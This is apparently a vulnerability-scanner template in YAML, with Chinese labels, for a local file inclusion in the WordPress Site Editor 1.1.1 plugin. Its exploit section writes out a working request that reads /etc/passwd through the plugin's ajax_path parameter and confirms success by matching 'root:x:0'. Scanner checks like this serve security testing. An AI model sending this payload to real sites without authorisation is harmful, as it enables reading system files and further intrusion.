product: WordPress
vName: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/44340
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
    verify:
      logic: and
      check:
        - regex:
            value:
              - 'root:x:0'
            logic: and
